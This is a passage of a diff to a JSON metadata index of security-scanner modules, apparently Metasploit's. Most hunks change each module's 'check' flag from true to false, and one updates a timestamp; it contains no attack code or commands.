    "path": "/modules/auxiliary/scanner/misc/zenworks_preboot_fileaccess.rb",
    "is_install_path": true,
    "ref_name": "scanner/misc/zenworks_preboot_fileaccess",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33646,7 +33878,7 @@
    "path": "/modules/auxiliary/scanner/mongodb/mongodb_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mongodb/mongodb_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33683,7 +33915,7 @@
    "path": "/modules/auxiliary/scanner/motorola/timbuktu_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/motorola/timbuktu_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33721,7 +33953,7 @@
    "path": "/modules/auxiliary/scanner/mqtt/connect.rb",
    "is_install_path": true,
    "ref_name": "scanner/mqtt/connect",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33758,7 +33990,7 @@
    "path": "/modules/auxiliary/scanner/msf/msf_rpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/msf/msf_rpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -33805,7 +34037,7 @@
    "path": "/modules/auxiliary/scanner/msf/msf_web_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/msf/msf_web_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -33848,7 +34080,7 @@
    "path": "/modules/auxiliary/scanner/msmail/exchange_enum.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/exchange_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33891,7 +34123,7 @@
    "path": "/modules/auxiliary/scanner/msmail/host_id.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/host_id",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33934,7 +34166,7 @@
    "path": "/modules/auxiliary/scanner/msmail/onprem_enum.go",
    "is_install_path": true,
    "ref_name": "scanner/msmail/onprem_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -33979,7 +34211,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34024,7 +34256,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34069,7 +34301,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_ping",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34114,7 +34346,7 @@
    "path": "/modules/auxiliary/scanner/mssql/mssql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mssql/mssql_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34154,7 +34386,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_authbypass_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_authbypass_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34192,7 +34424,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_file_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_file_enum",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34229,7 +34461,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34266,7 +34498,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34303,7 +34535,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34340,7 +34572,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34377,7 +34609,7 @@
    "path": "/modules/auxiliary/scanner/mysql/mysql_writable_dirs.rb",
    "is_install_path": true,
    "ref_name": "scanner/mysql/mysql_writable_dirs",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -34414,7 +34646,7 @@
    "path": "/modules/auxiliary/scanner/natpmp/natpmp_portscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/natpmp/natpmp_portscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34451,7 +34683,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_ntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_ntp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34497,7 +34729,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_rest_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_rest_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34543,7 +34775,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_xmlrpc_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34589,7 +34821,7 @@
    "path": "/modules/auxiliary/scanner/nessus/nessus_xmlrpc_ping.rb",
    "is_install_path": true,
    "ref_name": "scanner/nessus/nessus_xmlrpc_ping",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34626,7 +34858,7 @@
    "path": "/modules/auxiliary/scanner/netbios/nbname.rb",
    "is_install_path": true,
    "ref_name": "scanner/netbios/nbname",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34672,7 +34904,7 @@
    "path": "/modules/auxiliary/scanner/nexpose/nexpose_api_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nexpose/nexpose_api_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34710,7 +34942,7 @@
    "path": "/modules/auxiliary/scanner/nfs/nfsmount.rb",
    "is_install_path": true,
    "ref_name": "scanner/nfs/nfsmount",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34750,7 +34982,7 @@
    "path": "/modules/auxiliary/scanner/nntp/nntp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/nntp/nntp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -34790,7 +35022,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_monlist.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_monlist",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34831,7 +35063,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_nak_to_the_future.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_nak_to_the_future",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34870,7 +35102,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_peer_list_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34909,7 +35141,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_peer_list_sum_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_peer_list_sum_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34948,7 +35180,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_readvar.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_readvar",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -34987,7 +35219,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_req_nonce_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_req_nonce_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35026,7 +35258,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_reslist_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_reslist_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35065,7 +35297,7 @@
    "path": "/modules/auxiliary/scanner/ntp/ntp_unsettrap_dos.rb",
    "is_install_path": true,
    "ref_name": "scanner/ntp/ntp_unsettrap_dos",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35111,7 +35343,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_gsad_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_gsad_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35148,7 +35380,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_omp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_omp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35185,7 +35417,7 @@
    "path": "/modules/auxiliary/scanner/openvas/openvas_otp_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/openvas/openvas_otp_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35231,7 +35463,7 @@
    "path": "/modules/auxiliary/scanner/oracle/emc_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/emc_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35278,7 +35510,7 @@
    "path": "/modules/auxiliary/scanner/oracle/isqlplus_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/isqlplus_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35325,7 +35557,7 @@
    "path": "/modules/auxiliary/scanner/oracle/isqlplus_sidbrute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/isqlplus_sidbrute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35362,7 +35594,7 @@
    "path": "/modules/auxiliary/scanner/oracle/oracle_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -35402,7 +35634,7 @@
    "path": "/modules/auxiliary/scanner/oracle/oracle_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/oracle_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35439,7 +35671,7 @@
    "path": "/modules/auxiliary/scanner/oracle/sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_brute",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35477,7 +35709,7 @@
    "path": "/modules/auxiliary/scanner/oracle/sid_enum.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/sid_enum",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35523,7 +35755,7 @@
    "path": "/modules/auxiliary/scanner/oracle/spy_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/spy_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35560,7 +35792,7 @@
    "path": "/modules/auxiliary/scanner/oracle/tnslsnr_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnslsnr_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35598,7 +35830,7 @@
    "path": "/modules/auxiliary/scanner/oracle/tnspoison_checker.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/tnspoison_checker",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35644,7 +35876,7 @@
    "path": "/modules/auxiliary/scanner/oracle/xdb_sid.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/xdb_sid",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35691,7 +35923,7 @@
    "path": "/modules/auxiliary/scanner/oracle/xdb_sid_brute.rb",
    "is_install_path": true,
    "ref_name": "scanner/oracle/xdb_sid_brute",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35728,7 +35960,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35765,7 +35997,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35802,7 +36034,7 @@
    "path": "/modules/auxiliary/scanner/pcanywhere/pcanywhere_udp.rb",
    "is_install_path": true,
    "ref_name": "scanner/pcanywhere/pcanywhere_udp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35840,7 +36072,7 @@
    "path": "/modules/auxiliary/scanner/pop3/pop3_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -35877,7 +36109,7 @@
    "path": "/modules/auxiliary/scanner/pop3/pop3_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/pop3/pop3_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35916,7 +36148,7 @@
    "path": "/modules/auxiliary/scanner/portmap/portmap_amp.rb",
    "is_install_path": true,
    "ref_name": "scanner/portmap/portmap_amp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35953,7 +36185,7 @@
    "path": "/modules/auxiliary/scanner/portscan/ack.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ack",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -35991,7 +36223,7 @@
    "path": "/modules/auxiliary/scanner/portscan/ftpbounce.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/ftpbounce",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36028,7 +36260,7 @@
    "path": "/modules/auxiliary/scanner/portscan/syn.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/syn",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36066,7 +36298,7 @@
    "path": "/modules/auxiliary/scanner/portscan/tcp.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/tcp",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36103,7 +36335,7 @@
    "path": "/modules/auxiliary/scanner/portscan/xmas.rb",
    "is_install_path": true,
    "ref_name": "scanner/portscan/xmas",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36141,7 +36373,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_dbname_flag_injection.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_dbname_flag_injection",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36178,7 +36410,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_hashdump.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_hashdump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36217,7 +36449,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -36254,7 +36486,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_schemadump.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_schemadump",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36291,7 +36523,7 @@
    "path": "/modules/auxiliary/scanner/postgres/postgres_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/postgres/postgres_version",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36340,7 +36572,7 @@
    "path": "/modules/auxiliary/scanner/printer/canon_iradv_pwd_extract.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/canon_iradv_pwd_extract",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -36381,7 +36613,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_delete_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_delete_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36422,7 +36654,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_download_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_download_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36463,7 +36695,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_env_vars.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_env_vars",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36504,7 +36736,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_list_dir.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_dir",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36545,7 +36777,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_list_volumes.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_list_volumes",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36586,7 +36818,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_ready_message.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_ready_message",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36627,7 +36859,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_upload_file.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_upload_file",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36668,7 +36900,7 @@
    "path": "/modules/auxiliary/scanner/printer/printer_version_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/printer/printer_version_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36705,7 +36937,7 @@
    "path": "/modules/auxiliary/scanner/quake/server_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/quake/server_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36832,7 +37064,7 @@
    "path": "/modules/auxiliary/scanner/rdp/rdp_scanner.rb",
    "is_install_path": true,
    "ref_name": "scanner/rdp/rdp_scanner",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36872,7 +37104,7 @@
    "path": "/modules/auxiliary/scanner/redis/file_upload.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/file_upload",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -36909,7 +37141,7 @@
    "path": "/modules/auxiliary/scanner/redis/redis_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -36947,7 +37179,7 @@
    "path": "/modules/auxiliary/scanner/redis/redis_server.rb",
    "is_install_path": true,
    "ref_name": "scanner/redis/redis_server",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37021,7 +37253,7 @@
    "path": "/modules/auxiliary/scanner/rogue/rogue_send.rb",
    "is_install_path": true,
    "ref_name": "scanner/rogue/rogue_send",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37059,7 +37291,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rexec_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rexec_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37097,7 +37329,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rlogin_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rlogin_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37135,7 +37367,7 @@
    "path": "/modules/auxiliary/scanner/rservices/rsh_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/rservices/rsh_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37174,7 +37406,7 @@
    "path": "/modules/auxiliary/scanner/rsync/modules_list.rb",
    "is_install_path": true,
    "ref_name": "scanner/rsync/modules_list",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37222,7 +37454,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_user_mgmt.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_ctc_verb_tampering_user_mgmt",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -37273,7 +37505,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_hostctrl_getcomputersystem.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_hostctrl_getcomputersystem",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37321,7 +37553,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_icf_public_info.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icf_public_info",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37367,7 +37599,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_icm_urlscan",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37414,7 +37646,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_abaplog",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37457,11 +37689,11 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2017-07-24 06:26:21 +0000",
+    "mod_time": "2019-11-05 21:45:05 +0000",
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -37508,7 +37740,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_extractusers",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37555,7 +37787,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getaccesspoints",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37602,7 +37834,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getenv",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37650,7 +37882,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getlogfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37698,7 +37930,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocesslist.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocesslist",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37745,7 +37977,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_getprocessparameter",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37792,7 +38024,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_instanceproperties",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37840,7 +38072,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listconfigfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listconfigfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37887,7 +38119,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_listlogfiles",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37934,7 +38166,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_startprofile",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -37981,7 +38213,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_mgmt_con_version",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38021,7 +38253,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_router_info_request.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_router_info_request",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38100,7 +38332,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_service_discovery.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_service_discovery",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38148,7 +38380,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_smb_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_smb_relay",
-    "check": true,
+    "check": false,
    "post_auth": false,
    "default_credential": false,
    "notes": {
@@ -38195,7 +38427,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_bapi_user_create1.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_bapi_user_create1",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38242,7 +38474,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_brute_login",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": false,
    "notes": {
@@ -38289,7 +38521,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec.rb",
    "is_install_path": true,
    "ref_name": "scanner/sap/sap_soap_rfc_dbmcli_sxpg_call_system_command_exec",
-    "check": true,
+    "check": false,
    "post_auth": true,
    "default_credential": true,
    "notes": {
@@ -38336,7 +38568,7 @@
    "path": "/modules/auxiliary/scanner/sap/sap_soap_rfc_dbmcli_sxpg_command_exec.rb",
    "is_install_path": true,
